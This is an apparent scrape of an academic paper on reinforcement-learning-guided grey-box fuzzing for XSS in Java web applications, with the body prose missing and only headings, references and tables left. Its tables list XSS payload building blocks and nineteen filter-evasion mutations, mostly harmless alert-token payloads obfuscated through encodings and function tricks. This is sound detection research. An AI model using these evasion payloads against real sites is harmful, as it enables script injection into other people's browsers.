Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities
Abstract
:1. Introduction
- (1)
- We use static analysis to identify input points of Java web applications, including Java code (supporting Java Servlet and Spring framework), configuration files, and HTML code. Almost all potential input points of the web application could be covered.
- (2)
- We propose an XSS payload generation method based on reinforcement learning. The reinforcement learning model’s state, action, and reward function are defined in the XSS vulnerability detection scenario. We validate payload generation by DQN, DDQN, and Policy Gradient model.
- (3)
- To evaluate the effectiveness of the proposed method, we implement it and design systematic experiments. On the one hand, we compare the efficacy of different reinforcement learning models in XSS vulnerability detection. On the other hand, we compare the performance of the proposed method with four state-of-the-art web scanners. Experimental results show that our method is more effective.
2. Related Work
2.1. XSS Vulnerability Detection
2.2. Reinforcement Learning for Cyber Security
3. Background
3.1. XSS Vulnerability
- Reflected XSS directly reflects the user’s input to the browser, causing the browser to execute some scripts. In this kind of attack, the attacker usually constructs the attack payload, combines the attack payload with the link to form a malicious link, and tricks the user into visiting the link. When the user visits the link, it causes the browser to execute malicious scripts.
- Stored XSS stores the input data on the server side, and it will trigger when the data are displayed on the page visited by the user. Usually, the attacker uploads the attack payload on the page where text can be submitted (such as message boards, blogs, etc.), and when other users access the data, the attack vector will be activated.
- DOM-based XSS is a vulnerability that exploits the Document Object Model (DOM). The DOM allows scripts to dynamically access and update document content, structure, and styles, then display them on the page. This type of XSS vulnerability does not need to save the data to the server but executes the DOM data obtained by the client locally, which is also a reflected XSS in the strict sense.
3.2. Reinforcement Learning
4. Methodology
4.1. Static Analysis
- Method Annotations: GetMapping, PostMapping, PutMapping, DeleteMapping, PatchMapping, RequestMapping, WebServlet.
- Parameter Annotations: RequestParam, PathVariable.
- Data Type: String, Byte, Double, Float, Long, Character, Short, Boolean.
4.2. Payload Generation
4.2.1. Generation
4.2.2. Mutation
4.3. Reinforcement Learning Model
4.3.1. Model
4.3.2. State
4.3.3. Action
4.3.4. Reward
- (1)
- If an XSS vulnerability is found, Award+10 and the Episode ends;
- (2)
- No XSS vulnerability found, Award-1, Episode continues;
- (3)
- Found repeatedly generated XSS payload, Award-5, Episode continues;
- (4)
- When the 10th generation is reached, the Episode ends and returns to the initial state.
4.4. Observation
5. Evaluation
- RQ1. Effectiveness: Is the proposed method able to detect XSS vulnerabilities?
- RQ2. Comparison with other tools: Does the proposed method perform better than other tools? What is the reason?
- RQ3. Resource consumption: Is the proposed method consuming excessive system resources?
5.1. Experimental Setup
5.2. Result and Analysis
5.2.1. Answering RQ1: Effectiveness
5.2.2. Answering RQ2: Comparison with Other Tools
5.2.3. Answering RQ3: Resource Consumption
6. Conclusions
Author Contributions
Funding
Institutional Review Board Statement
Informed Consent Statement
Data Availability Statement
Conflicts of Interest
References
- Gu, H.; Zhang, J.; Liu, T.; Hu, M.; Zhou, J.; Wei, T.; Chen, M. DIAVA: A traffic-based framework for detection of SQL injection attacks and vulnerability analysis of leaked data. IEEE Trans. Reliab. 2019, 69, 188–202. [Google Scholar] [CrossRef]
- Jaafar, G.A.; Abdullah, S.M.; Ismail, S. Review of recent detection methods for HTTP DDoS attack. J. Comput. Netw. Commun. 2019, 2019, 1693–1696. [Google Scholar] [CrossRef] [Green Version]
- Khodayari, S.; Pellegrino, G. JAW: Studying Client-Side CSRF with Hybrid Property Graphs and Declarative Traversals. In Proceedings of the 30th USENIX Security Symposium (USENIX Security 21), Online, 11–13 August 2021; pp. 2525–2542. [Google Scholar]
- Steffens, M.; Rossow, C.; Johns, M.; Stock, B. Don’t Trust the Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild. In Proceedings of the 26th Annual Network and Distributed System Security Symposium, San Diego, CA, USA, 24–27 February 2019; pp. 1–15. [Google Scholar]
- Cross-Site Scripting Prevention Cheat Sheet Series. Available online: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html (accessed on 30 November 2022).
- CVE-CVE. Available online: https://cve.mitre.org/ (accessed on 30 November 2022).
- OWASP Foundation, the Open Source Foundation for Application Security on the Main Website for The OWASP Foundation. OWASP Is a Nonprofit Foundation That Works to Improve the Security of Software. Available online: https://owasp.org/ (accessed on 21 November 2022).
- Algaith, A.; Nunes, P.; Jose, F.; Gashi, I.; Vieira, M. Finding SQL injection and cross site scripting vulnerabilities with diverse static analysis tools. In Proceedings of the 14th European Dependable Computing Conference (EDCC), Iași, Romania, 10–14 September 2018; pp. 57–64. [Google Scholar]
- Wang, R.; Xu, G.; Zeng, X.; Li, X.; Feng, Z. TT-XSS: A novel taint tracking based dynamic detection framework for DOM Cross-Site Scripting. J. Parallel Distrib. Comput. 2018, 118, 100–106. [Google Scholar] [CrossRef]
- Melicher, W.; Das, A.; Sharif, M.; Bauer, L.; Jia, L. Riding out domsday: Towards detecting and preventing dom cross-site scripting. In Proceedings of the 25th Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, USA, 18–21 February 2018; pp. 1–15. [Google Scholar]
- Santos, J.F.; Rezk, T. An information flow monitor-inlining compiler for securing a core of javascript. In Proceedings of the IFIP International Information Security Conference, Marrakech, Morocco, 2–4 June 2014; pp. 278–292. [Google Scholar]
- Maurel, H.; Vidal, S.; Rezk, T. Statically identifying XSS using deep learning. Sci. Comput. Program. 2022, 219, 1–20. [Google Scholar] [CrossRef]
- Erdődi, L.; Sommervoll, Å.Å.; Zennaro, F.M. Simulating SQL injection vulnerability exploitation using Q-learning reinforcement learning agents. J. Inf. Secur. Appl. 2021, 61, 1–10. [Google Scholar] [CrossRef]
- Liu, M.; Zhang, B.; Chen, W.; Zhang, X. A survey of exploitation and detection methods of XSS vulnerabilities. IEEE Access 2019, 7, 182004–182016. [Google Scholar] [CrossRef]
- Gupta, S.; Gupta, B. CSSXC: Context-sensitive sanitization framework for Web applications against XSS vulnerabilities in cloud environments. Procedia Comput. Sci. 2016, 85, 198–205. [Google Scholar] [CrossRef] [Green Version]
- Liu, M.; Wang, B. A web second-order vulnerabilities detection method. IEEE Access 2018, 6, 70983–70988. [Google Scholar] [CrossRef]
- Melicher, W.; Fung, C.; Bauer, L.; Jia, L. Towards a lightweight, hybrid approach for detecting dom XSS vulnerabilities with machine learning. In Proceedings of the Web Conference 2021, Ljubljana, Slovenia, 19–23 April 2021; pp. 2684–2695. [Google Scholar]
- Choi, H.; Hong, S.; Cho, S.; Kim, Y.G. HXD: Hybrid XSS detection by using a headless browser. In Proceedings of the 4th International Conference on Computer Applications and Information Processing Technology (CAIPT), Kuta Bali, Indonesia, 8–10 August 2017; pp. 1–4. [Google Scholar]
- Nguyen, T.T.; Reddi, V.J. Deep reinforcement learning for cyber security. IEEE Trans. Neural Netw. Learn. Syst. 2021, 1–17. [Google Scholar] [CrossRef] [PubMed]
- Evading Web Application Firewalls with Reinforcement Learning. Available online: https://openreview.net/forum?id=m5AntlhJ7Z5 (accessed on 1 January 2022).
- Caturano, F.; Perrone, G.; Romano, S.P. Discovering reflected cross-site scripting vulnerabilities using a multiobjective reinforcement learning environment. Comput. Secur. 2021, 103, 1–16. [Google Scholar] [CrossRef]
- Fang, Y.; Huang, C.; Xu, Y.; Li, Y. RLXSS: Optimizing XSS detection model to defend against adversarial attacks based on reinforcement learning. Future Internet 2019, 11, 177. [Google Scholar] [CrossRef] [Green Version]
- Lee, S.; Wi, S.; Son, S. Link: Black-Box Detection of Cross-Site Scripting Vulnerabilities Using Reinforcement Learning. In Proceedings of the ACM Web Conference 2022, Lyon, France, 25–29 April 2022; pp. 743–754. [Google Scholar]
- Gupta, S.; Gupta, B.B. Cross-Site Scripting (XSS) attacks and defense mechanisms: Classification and state-of-the-art. Int. J. Syst. Assur. Eng. Manag. 2017, 8, 512–530. [Google Scholar] [CrossRef]
- Rodríguez, G.E.; Torres, J.G.; Flores, P.; Benavides, D.E. Cross-site scripting (XSS) attacks and mitigation: A survey. Comput. Netw. 2020, 166, 106960–1069830. [Google Scholar] [CrossRef]
- Arulkumaran, K.; Deisenroth, M.P.; Brundage, M.; Bharath, A.A. Deep Reinforcement Learning: A Brief Survey. IEEE Signal Process. Mag. 2017, 34, 26–38. [Google Scholar] [CrossRef] [Green Version]
- White, D.J. A survey of applications of Markov decision processes. J. Oper. Res. Soc. 1993, 44, 1073–1096. [Google Scholar] [CrossRef]
- Headless Browser-Wikipedia. Available online: https://en.wikipedia.org/wiki/Headless_browser (accessed on 30 November 2022).
- Jakarta Servlet 5.0|The Eclipse Foundation. Available online: https://jakarta.ee/specifications/servlet/5.0/ (accessed on 30 November 2022).
- Spring Framework. Available online: https://spring.io/projects/spring-framework (accessed on 30 November 2022).
- Java Annotation-Wikipedia. Available online: https://en.wikipedia.org/wiki/Java_annotation (accessed on 30 November 2022).
- The Deployment Descriptor: Web.xml|App Engine Standard Environment for Java 8|Google Cloud. Available online: https://cloud.google.com/appengine/docs/legacy/standard/java/config/webxml (accessed on 30 November 2022).
- Zheng, Y.; Davanian, A.; Yin, H.; Song, C.; Zhu, H.; Sun, L. FIRM-AFL: High-Throughput Greybox Fuzzing of IoT Firmware via Augmented Process Emulation. In Proceedings of the 28th USENIX Security Symposium (USENIX Security 19), Santa Clara, CA, USA, 14–16 August 2019; pp. 1099–1114. [Google Scholar]
- Watkins, C.J.; Dayan, P. Q-learning. Mach. Learn. 1992, 8, 279–292. [Google Scholar] [CrossRef]
- Kakade, S.M. A natural policy gradient. Adv. Neural Inf. Process. Syst. 2001, 14, 1–8. [Google Scholar]
- Mnih, V.; Kavukcuoglu, K.; Silver, D.; Graves, A.; Antonoglou, I.; Wierstra, D.; Riedmiller, M. Playing atari with deep reinforcement learning. arXiv 2013, arXiv:1312.5602. [Google Scholar]
- Van Hasselt, H.; Guez, A.; Silver, D. Deep reinforcement learning with double q-learning. In Proceedings of the AAAI Conference on Artificial Intelligence, Phoenix, AZ, USA, 12–17 February 2016; pp. 2094–2100. [Google Scholar]
- Dann, C.; Mansour, Y.; Mohri, M.; Sekhari, A.; Sridharan, K. Guarantees for epsilon-greedy reinforcement learning with function approximation. In Proceedings of the International Conference on Machine Learning, Baltimore, MD, USA, 17–23 July 2022; pp. 4666–4689. [Google Scholar]
- ASM. Available online: https://asm.ow2.io/index.html (accessed on 30 November 2022).
- Fast and Reliable End-to-End Testing for Modern Web Apps | Playwright. Available online: https://playwright.dev/ (accessed on 30 November 2022).
- OWASP WebGoat | OWASP Foundation. Available online: https://owasp.org/www-project-webgoat/ (accessed on 25 November 2022).
- GitHub-Zchuanzhao/Jeesns. Available online: https://github.com/zchuanzhao/jeesns/ (accessed on 30 November 2022).
- Burp Suite-Application Security Testing Software. Available online: https://portswigger.net/burp (accessed on 25 November 2022).
- Acunetix | Web Application Security Scanner. Available online: https://www.acunetix.com/ (accessed on 25 November 2022).
- GitHub-s0md3v/XSStrike: Most Advanced XSS Scanner. Available online: https://github.com/s0md3v/XSStrike (accessed on 30 November 2022).
- GitHub-Yaklang/Yakit: Cyber Security ALL-IN-ONE Platform. Available online: https://github.com/yaklang/yakit (accessed on 30 November 2022).
No | Part | Dictionary |
---|---|---|
1 | HTML Tag | “a”, “area”, “audio”, “b”, “bgsound”, “body”, “br”, “button”, “form”, “frame”, “canvas”, “div”, “embed”, “frameset”, “h1”, “h2”, “h3”, “h4”, “h5”, “h6”, “iframe”, “img”, “input”, “link”, “menu”, “meta”, “object”, “ol”, “p”, “script”, “select”, “span”, “strong”, “style”, “table”, “tbody”, “td”, “textarea”, “tfoot”, “th”, “thead”, “title”, “tr”, “ul”, “video” |
2 | HTML Attribute | “src=x”, “href=x”, “href=“javascript:”, “src=“javascript:” |
3 | HTML Event | “onClick”, “onError”, “onLoad”, “onKeyDown”, “onKeyPress”, “onKeyUp”, “onContextMenu”, “onDoubleClick”, “onDrag”, “onDragEnd”, “onDragEnter”, “onDragExit”, “onDragLeave”, “onDragOver”, “onDragStart”, “onDrop”, “onMouseDown”, “onMouseEnter”, “onMouseLeave”, “onMouseMove”, “onMouseOut”, “onMouseOver”, “onMouseUp” |
4 | JS Snippet | “alert(‘webfuzzer-token’)”, “prompt(‘webfuzzer-token’)”, “confirm(‘webfuzzer-token’)”, “console.log(‘webfuzzer-token’)”, “alert(\”webfuzzer-token\”)”, “prompt(\”webfuzzer-token\”)”, “confirm(\”webfuzzer-token\”)”, “console.log(\”webfuzzer-token\”)” |
No | Type | Description | Mutated Payload |
---|---|---|---|
1 | Angle Bracket Recoding | Use %3c and %3e instead of < and >. | %3Cfont onmousemove = alert(‘webfuzzer-token’)%3E%3C/font%3E |
2 | Random Case Conversion | Invert the case of the characters in the payload (no more than half the number of characters). | <fONt OnmOuSEmoVE = aLERt(‘WEbfuZzEr-tokEn’)></fONt> |
3 | Space Insertion | Randomly insert spaces in the payload. | <font onmousemove = alert(‘webfuzzer-token’)></font > |
4 | Keyword Redundancy | Duplicate part of keywords. | <f<font>ont onmousemove = alert(‘webfuzzer-token’)></font> |
5 | Coding Conversion (URL) | Encode the JS snippet in the payload in URL encoding. | <font onmousemove = eval(‘%61%6c%65%72%74%28%27%77%65%62%66%75%7a%7a%65%72%2d%74%6f%6b%65%6e%27%29’)></font> |
6 | Coding Conversion (Base64) | Encode the JS snippet in the payload in Base64. | <font onmousemove = eval(atob(‘YWxlcnQoJ3dlYmZ1enplci10b2tlbicp’))></font> |
7 | Coding Conversion (Hex) | Encode the JS snippet in the payload in hexadecimal. | <font onmousemove = Set.constructor‘\x61\x6c\x65\x72\x74\x28\x27\x77\x65\x62\x66\x75\x7a\x7a\x65\x72\x2d\x74\x6f\x6b\x65\x6e\x27\x29‘‘‘></font> |
8 | Coding Conversion (Unicode) | Encode the JS snippet in the payload in Unicode. | <font onmousemove = setTimeout‘\u{61}\u{6c}\u{65}\u{72}\u{74}\u{28}\u{27}\u{77}\u{65}\u{62}\u{66}\u{75}\u{7a}\u{7a}\u{65}\u{72}\u{2d}\u{74}\u{6f}\u{6b}\u{65}\u{6e}\u{27}\u{29}‘></font> |
9 | Coding Conversion (Ascii) | Encode the JS snippet in the payload in Ascii. | <font onmousemove = eval(String.fromCharCode(97,108,101,114,116,40,39,119,101,98,102,117,122,122,101,114,45,116,111,107,101,110,39,41)></font> |
10 | JS Function Replacement (top) | Use the top() function to rewrite the payload. | <font onmousemove = top[‘ale’+’rt’](‘webfuzzer-token’)></font> |
11 | JS Function Replacement (eval) | Use the eval() function to rewrite the payload. | <font onmousemove = top.eval(‘a’+’lert’)(‘webfuzzer-token’)></font> |
12 | JS Function Replacement (self) | Use the self() function to rewrite the payload. | <font onmousemove = self[‘al’+’ert’](‘webfuzzer-token’)></font> |
13 | JS Function Replacement (this) | Use the this() function to rewrite the payload. | <font onmousemove = this[‘a’+’lert’](‘webfuzzer-token’)></font> |
14 | JS Function Replacement (toString) | Use the toString() function to rewrite the payload. | <font onmousemove = top [8680439..toString(30)](‘webfuzzer-token’)></font> |
15 | JS Function Replacement (custom function) | Use the custom function to rewrite the payload. In this example, we define the a() function. | <font onmousemove = a(this);function a(){}(alert(‘webfuzzer-token’))></font> |
16 | Backticks Insertion | Use backticks to diversify function calls. | <font onmousemove = javascript:‘${alert(‘webfuzzer-token’)}‘></font> |
17 | Regex | Insert special symbols in the payload and remove them using regular expressions. | <font onmousemove = eval(“~a~l~e~r~t~(~’~w~e~b~f~u~z~z~e~r~-~t~o~k~e~n~’~)~”.replace(/~/g, ‘‘))></font> |
18 | Quotes Change | Change single quotes to double quotes. | <font onmousemove = alert(“webfuzzer-token”)></font> |
19 | No Mutation | - | <font onmousemove = alert(‘webfuzzer-token’)></font> |
Symbol | Description | Value |
---|---|---|
Learning rate | 0.01 | |
Discount factor | 0.95 | |
The probability of choosing an action at random | 0.1 | |
Update interval rounds for the target network | 10 | |
BATCH_SIZE | Number of samples | 32 |
REPLAY_SIZE | Experience pool size | 1000 |
Type | Injection Point | Non-Injection Point |
---|---|---|
Integer, Double, Float, Long, Short | random number + payload | random number |
Boolean | 50% probability true + payload, 50% probability false + payload | half probability of true and false |
Byte | byte sequence of length 7 + payload | byte sequence of length 7 |
Character | alphabet or number + payload | alphabet of number |
Other | string from static analysis or random string of length 7 + payload | string from static analysis or random string of length 7 |
Web Application | RL Model | Vulnerability Count | Time | Detection Rate |
---|---|---|---|---|
WebGoat | random | 5 | - | 29.4% |
DQN | 15 | 2 h46 m20 s | 88.2% | |
DDQN | 17 | 3 h 4 m 3 s | 100.0% | |
Policy Gradient | 14 | 4 h 21 m 8 s | 82.4% | |
Jeesns | random | 3 | - | 37.5% |
DQN | 5 | 4 h 31 m14 s | 62.5% | |
DDQN | 8 | 5 h 59 m 35 s | 100.0% | |
Policy Gradient | 8 | 7 h 21 m 3 s | 100.0% |
No | Input Point | Time (s) | ||
---|---|---|---|---|
DQN | DDQN | Policy Gradient | ||
1 | /2022121558/400 | 2.8 | 23.4 | 41.9 |
2 | /1382523204/900 | 3.2 | 5.2 | 14.4 |
3 | /1406352188/900 | 6.1 | 7.4 | 29.6 |
4 | /1750680855/400 | 1.5 | 3.8 | 12.3 |
5 | /1572295549/1100 | 1.4 | 6.3 | 9.5 |
6 | /538385464/1100 | 2.7 | 3.0 | 14.5 |
7 | /980912706/1100 | 2.9 | 4.0 | 20 |
8 | /1036971378/1200 | 2.9 | 5.1 | 14.9 |
9 | /1786050421/1500 | 2.8 | 4.5 | 39.9 |
10 | /1319172155/1900 | 3.0 | 6.0 | 14.5 |
11 | /611366032/900/5 | 112.7 | 117.0 | 31.5 |
12 | /1584137874/1700 | 3.5 | 3.5 | 18.1 |
13 | /1001855130/900 | 24.9 | 17.4 | 7.5 |
14 | /693820813/900 | 34.8 | 17.8 | 20.4 |
15 | /478442269/900 | 32 | 37 | 16 |
16 | /1642011371/900 | 6.6 | 9.0 | 24.3 |
17 | /751836712/900 | 14.8 | 12.6 | 11.3 |
No | Input Point | Time (s) | ||
---|---|---|---|---|
DQN | DDQN | Policy Gradient | ||
1 | /article/add | 252.6 | 165.2 | 108.5 |
2 | /weibo/list | 16.1 | 145.7 | 34.7 |
3 | /question/ask | 8.0 | 57.3 | 2.3 |
4 | /article/detail/ | 22.2 | 146.4 | 32.2 |
5 | /group/post/ | 8.5 | 63.774 | 97.7 |
6 | /question/detail/ | 28.1 | 238.3 | 33.2 |
7 | /group/topic/ | 22.6 | 145.6 | 33.28 |
8 | /weibo/detail/ | 18.8 | 164.8 | 24.1 |
Web Application | Scanner | Vulnerability Count | Detection Rate |
WebGoat | Burp Suite | 13 | 76.5% |
AWVS | 7 | 41.2% | |
XSStrike | 5 | 29.4% | |
Yakit | 6 | 35.3% | |
Jeesns | Burp Suite | 3 | 37.5% |
AWVS | 8 | 100.0% | |
XSStrike | 3 | 37.5% | |
Yakit | 4 | 80.0% |
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content. |
© 2023 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (https://creativecommons.org/licenses/by/4.0/).
Share and Cite
Song, X.; Zhang, R.; Dong, Q.; Cui, B. Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities. Appl. Sci. 2023, 13, 2482. https://doi.org/10.3390/app13042482
Song X, Zhang R, Dong Q, Cui B. Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities. Applied Sciences. 2023; 13(4):2482. https://doi.org/10.3390/app13042482
Chicago/Turabian StyleSong, Xuyan, Ruxian Zhang, Qingqing Dong, and Baojiang Cui. 2023. "Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities" Applied Sciences 13, no. 4: 2482. https://doi.org/10.3390/app13042482
APA StyleSong, X., Zhang, R., Dong, Q., & Cui, B. (2023). Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities. Applied Sciences, 13(4), 2482. https://doi.org/10.3390/app13042482